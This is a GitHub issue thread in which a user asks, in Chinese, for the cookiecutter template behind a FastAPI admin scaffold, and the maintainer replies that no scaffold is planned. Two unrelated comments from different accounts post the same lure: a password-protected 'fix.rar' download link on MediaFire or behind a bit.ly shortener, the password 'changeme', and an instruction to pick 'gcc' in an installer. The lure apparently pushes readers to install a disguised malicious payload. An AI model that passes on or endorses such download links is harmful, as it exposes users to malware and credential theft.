### ISSUE TITLE
这个fastapi脚手架不错，能告知一下cookiecutter地址吗

### ISSUE THREAD

**Issue by nrtzhou** [sleep1223/fast-soy-admin#7]
谢谢大佬

**Comment by Viotemis** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by sleep1223** [comment]
暂时没有脚手架计划
